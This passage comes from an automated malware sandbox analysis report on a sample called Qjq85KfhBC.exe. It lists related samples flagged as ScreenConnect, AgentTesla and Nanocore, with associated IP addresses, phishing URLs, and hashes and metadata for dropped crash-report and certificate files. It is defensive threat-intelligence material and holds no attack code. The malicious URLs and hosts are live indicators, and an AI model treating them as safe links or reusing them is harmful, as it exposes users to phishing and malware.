                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                              • VT rate limit hit for: Qjq85KfhBC.exe
Time | Type | Description
13:27:13 | API Interceptor | 147009x Sleep call for process: dfsvc.exe modified
13:27:13 | API Interceptor | 1x Sleep call for process: Qjq85KfhBC.exe modified
13:27:15 | API Interceptor | 2x Sleep call for process: svchost.exe modified
13:27:22 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  Iw6bIFfJSu.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comxrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.18
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.18
                                                                                                                                                                                                                                  https://accesspage853.ubpages.com/4k5-ffdfgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 217.20.57.19
                                                                                                                                                                                                                                  https://thegramp.nimbusweb.me/share/11336505/nigrk0yirmsg8qt4s4nmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 217.20.57.25
                                                                                                                                                                                                                                  https://coinbase-team.net-s07.live/Zendesk/invite/ca2fd752-4355?rid=Ztd9NzCGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 217.20.57.27
                                                                                                                                                                                                                                  Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.34
                                                                                                                                                                                                                                  l4MyhIt40P.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.39
                                                                                                                                                                                                                                  Gcca4WygdZ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 217.20.57.35
                                                                                                                                                                                                                                  https://ek3k.workspectrumhub.com/bdDURYAVGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 217.20.57.22
                                                                                                                                                                                                                                  https://realestatemania.ca/kxyNao-7Ms6e-WBJnj-uMnVb-7gZJL-v8aOp.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 217.20.57.18
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  OTAVANET-ASCZxrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  gunzipped.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                                                  • 79.110.49.176
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0exrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://beta.adiance.com/wp-content/plugins/arull.php?7096797967704b5369323074645079557a5054436e4e5379314f7a644d725474524c7a732f564c7a4f4b794d6a574277413dhttps://digidunesen.sa.com/v2Xhk/#X%5Bemail%5DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  SecuriteInfo.com.Gen.Variant.Jaik.244817.4008.28987.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://8i.eryonficket.com/g60ff/#aGVzc2dyb3VwaW52QGhlc3MuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NngTeRowYVzfBggLgr0jnYTDMmRw1imFIm2ET99YaDpZTcYzDf4_j-5YFTogaUxno5U6mNO7vBpPu8_Qjtn233vjPaHL2UbGDlhZQdGA3D25CwqECHxQCRtUKDBEqYowFBHIAzLTnKpBZet0FyIbh36NsUUZbSRWq6o0ZyOmIf1hCVhGuO6UGV5eawzRsIwkKvzidjgnmqdlkZtGukb6XGa_iBxPDbSv-k30p9lo3wdD1QatTUJJEohlFBchxhBckADPJi-N1FZ3iloNeeN8qyMNfc5Ys1judUQjU1gwK5EC2qllcEVWuSrLoChCMIK0bJx3mPJ19_Q6xTN6_Zu96Pc7y6XXfCBdt0HNrv0PBZaGs3DaTjQy2mYbupspnNefrFYvM3J35vc35X37_6zGK5f_2fVvaX7a1xVnPf0z2a5XZydZJdxPiwTRro9fX4wlOTmAb-lz_0effAv103-GQAA__9hXKLJGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 79.110.49.185
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exexrWUzly94Z.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                    EPCo9k8NIn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                      X5zNv1VJia.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                        AmedVA2n92.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                          z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                            wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                              3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                  wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                                    3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.88077366431059
Encrypted:false
SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9c:0J7adfWuK0p/QDfKoPeuP0aN4fqoxb
MD5:EB0DE4B6E58C6CF56FBB9ED399BDA4A0
SHA1:95FAC8724D9BBA52869FB204D63F20151A67C8E8
SHA-256:E522C9B72D470C31BC27C8A27B445DE0D7195FDAB698CBE1CFF60F5721A86679
SHA-512:44C9CAE9B930B4850C520158CFF55897B34D2361EF5D880B84F31D79FD9DEC8A771C2DFBEE79297FECEFF23241EC54F068A9480F051E8A3337C3038E077D7B97
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5f1e8a73, page size 16384, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.7880806865590014
Encrypted:false
SSDEEP:1536:fSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:fazaPv4V4fXq2UaB
MD5:EF575398C1F3C586410C0003117E6038
SHA1:DAF7F66626FE04223E25273BF04DEAF70383F177
SHA-256:27D72BF450C8553E258EC889CFD040761DB0E7CF4D7DC1171A96E07E9B846CFF
SHA-512:F1E3E2D0EEC6F411E5ACCA71761092A8440EF3798A037817A3B1812DCA90A28EF6EF83D279EDE2840C85A9EDF07648C9861D86B06F3E774EC313CA80657946F2
Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                                      Entropy (8bit):0.08085146930093884
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:mni/KYedL8vi1XlVG0+q2Iqe8lAjtll/ollNTt/4ll/Q6beV/:mi/KzdL1GE8lAB/AHtc6V
                                                                                                                                                                                                                                                      MD5:AFA8FC3BF33810F7204FEB3C1B29D6AE
                                                                                                                                                                                                                                                      SHA1:652F62463B430DD36649F33A764DDE45343AAFBB
                                                                                                                                                                                                                                                      SHA-256:F70C014728F7AA312FFE535230578D57CB6925DF99C2EAA0AF0EE1563AB88AB5
                                                                                                                                                                                                                                                      SHA-512:30D5096731D2C3931168F7D717622114447A70D4140B600895AFC1AAD9119EF86EC2DF981649B18224D1F624E26B8FF04703C10FCEB2BC89312598DD6E88C1C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):0.9129777971610298
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:BdFkkoZKsOhqnGXyf8QXIDcQvc6QcEVcw3cE/3+HbHg/Jg+OgBCXEYcI+1sTJvM6:7AZK+X0BU/Qji0ozuiFMZ24IO8O
                                                                                                                                                                                                                                                      MD5:2C62387064E8B284056A6246D2B9A110
                                                                                                                                                                                                                                                      SHA1:0941F53FCEEDE28CC851F28C90AE67E0B0ADBA21
                                                                                                                                                                                                                                                      SHA-256:70901AA53217927428AE537EB31FBBACFAB2F13980A0FB37D04E55936364A491
                                                                                                                                                                                                                                                      SHA-512:2AD4D220CF90397CCEF941B80B4D1E7BC69D5F36F8974E7C50769CE9E7BEFFC05D1BD1EB6C34BEE38DBA7892EAB51376F62E64337E155A49F595944537B91C53
                                                                                                                                                                                                                                                      Malicious:true
Preview:
Version=1
EventType=APPCRASH
EventTime=133743508350686303
ReportType=2
Consent=1
UploadTime=133743508359280152
ReportStatus=524384
ReportIdentifier=8a4be26c-4141-4233-baf7-0c752d32c8e0
IntegratorReportIdentifier=b4b26bdb-b28c-40b9-a9c9-10eef4c92626
Wow64Host=34404
Wow64Guest=332
NsAppName=Qjq85KfhBC.exe
AppSessionGuid=00001de0-0001-0013-6e55-b9200327db01
TargetAppId=W:00068500019053822e502fce051a806c457f0000ffff!0000f3333b1aff0e5cafd2bbb96457165f231d0dc73e!Qjq85KfhBC.exe
TargetApp
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:27:15 2024, 0x1205a4 type
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):77704
                                                                                                                                                                                                                                                      Entropy (8bit):1.746996583444887
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:6wZYdkhI/bMEV1APHtVShkjPgovFKfZE:fKOhI/oEV1qtVShQPrFKBE
                                                                                                                                                                                                                                                      MD5:B8573B212402869BC6EA58ED363342EB
                                                                                                                                                                                                                                                      SHA1:57D9478D8ED1B2A40E385DFEC8FAF4577F8219EC
                                                                                                                                                                                                                                                      SHA-256:4986E6C9510E014FE4BEC080BD969C5FC6A6A760FF05D88BA8E7B876D60F828A
                                                                                                                                                                                                                                                      SHA-512:120CC9225252698C9316E5247CBBFBB816A8EDABB1CB3549E3667730D889555F2AF25F0A5D4F4A6FC52D3E6CDD6726C7208D792E829713B0E7C4B9547E5EEF9E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8330
                                                                                                                                                                                                                                                      Entropy (8bit):3.7058853145838024
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJ/t6L6DT6YWWSUATAgmfetMprX89bHHAsf4NHm:R6lXJF6GDT6YHSUAUgmfetZHHTfWG
                                                                                                                                                                                                                                                      MD5:C4BD472357639B7CD9CC1CCCB706BA9D
                                                                                                                                                                                                                                                      SHA1:8589BCA3E4491DC95B7B014FEBCAF2080F109700
                                                                                                                                                                                                                                                      SHA-256:CB2D86B98470FD9A6130BE757D514CC9206E7A38BAAF5561D0B322DF1A8B09BA
                                                                                                                                                                                                                                                      SHA-512:621C982C1117C3859707D3A2BD540D10DE94217A1EAB00AF702F43B9F8629E5DA723AD6F4B0CA2C55A7763106D719075DE2AF4890D39DB161CCDE26EE514693E
                                                                                                                                                                                                                                                      Malicious:false
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>7648</Pi
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4593
                                                                                                                                                                                                                                                      Entropy (8bit):4.489097738988475
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsWJg77aI9idWpW8VYZYm8M4JW4LFbQj+q8FUmoMq7xnd:uIjfsI7cs7VVJWFe+7xnd
                                                                                                                                                                                                                                                      MD5:88481ED21003170DCE4267D6A4353E86
                                                                                                                                                                                                                                                      SHA1:AB4915F46769E62730DE99062F100D75B4C0B738
                                                                                                                                                                                                                                                      SHA-256:18B4F9EDBDDB5C5DF59ECD45BE037A6B28D30EBDB1EDA2C78D4A28E7948CC766
                                                                                                                                                                                                                                                      SHA-512:4A757640A01DD6FB8EE3810225E1A4A9BFB7B23364FEBE64A22752B07391D2128BD9AE81DB255EF14F71E634A5CB5AAB68902224B2CCC25AE430A16F37D3A108
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559229" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):89038
                                                                                                                                                                                                                                                      Entropy (8bit):3.0927724706776085
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:55+3KNAn0v+0NAxPR32FFtTimBUAdZB2baVBtS5ZdF5joI6Am/7C5xs535M1dmzp:55+3KNAn0v+0NAxPR32FFtTimBUAdZAk
                                                                                                                                                                                                                                                      MD5:CDC4634B17E5C770D1B176DAA2E251A0
                                                                                                                                                                                                                                                      SHA1:519E18FF5005B2107BA276F00914964B86C28CA4
                                                                                                                                                                                                                                                      SHA-256:1F4DE2696BE1AD939E82B9F96785A487543705F68FDF5E7012707B484A5979CB
                                                                                                                                                                                                                                                      SHA-512:C194B3F71A8BEE09FCC4D2795A5F14D39F6388473DEE79E23B3DFFA3DE893F5153CE9E856C4BAE4302582419FD45E2C4CC51D5C68C37E9BD22BDD54C1448A6DF
                                                                                                                                                                                                                                                      Malicious:false
Preview:ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13340
                                                                                                                                                                                                                                                      Entropy (8bit):2.6864126695205797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:TiZYWRD1ZTVYRlYNWbH8YEZeqt+iWkg5/wcrEjHa+5IGM272o2IIo3:2ZDRB0LVSa+5TM2SoxIo3
                                                                                                                                                                                                                                                      MD5:204CC550F931BDD5D236FEB4AD4DCEF6
                                                                                                                                                                                                                                                      SHA1:DEC6E102A8A04424F6A3390C69EE3D691EF9BA8A
                                                                                                                                                                                                                                                      SHA-256:5AC14B51D2E7078EA819BC84764B5717188D180BD25975EC030980C50FB8790B
                                                                                                                                                                                                                                                      SHA-512:B6667CC8D0742596B9DF6D2BE100B6639E744D4CA4EB5E67C0E607E371133522E0F6B80B8D7D2A81FEF743C75E4E262690A8759B7BE6C1108412C0B55770CCB8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4770
                                                                                                                                                                                                                                                      Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                      MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                      SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                      SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                      SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):71954
                                                                                                                                                                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                                                                                                      Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                      MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                      SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                      SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                      SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):727
                                                                                                                                                                                                                                                      Entropy (8bit):7.563840806637443
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:5onfZPc5RlRtBfQRKsS3GO1OfBJWPggSMcJD0Khky41hrQOSFxvF0nBwUU2wZ:5iFcdZ6KP3YHHMcJyyO9QOSunaT2wZ
                                                                                                                                                                                                                                                      MD5:23D2A40D03B92FF977A4F7F3F5B7B3D6
                                                                                                                                                                                                                                                      SHA1:DFAF45BE65A508FED92543473C235FB9E56EC900
                                                                                                                                                                                                                                                      SHA-256:42931FA0CF548D85BAB78A132B91B75AF2E8C94891568C976BE1C9B48D3ECAB1
                                                                                                                                                                                                                                                      SHA-512:2383D3513513D6D929FD1B7D780D152B3D8240EC013DEF216C6BAB6127B3C4BC523770A1BD388A84100C0672E68B6C46E62DDAAD78BB641E084C6F43690C1966
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1428
                                                                                                                                                                                                                                                      Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                      MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                      SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                      SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                      SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                                                      Entropy (8bit):3.462038329656643
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKp3mTsK8qJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Bm/OkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                      MD5:6179531C1FC3974FF6774A23F9885A5A
                                                                                                                                                                                                                                                      SHA1:5B90156B130E3702CC309E43F782AC077FB28C56
                                                                                                                                                                                                                                                      SHA-256:72992C16E1857777F620FD13725A70B5A336DC11A67EE1D14032F9678C08BF90
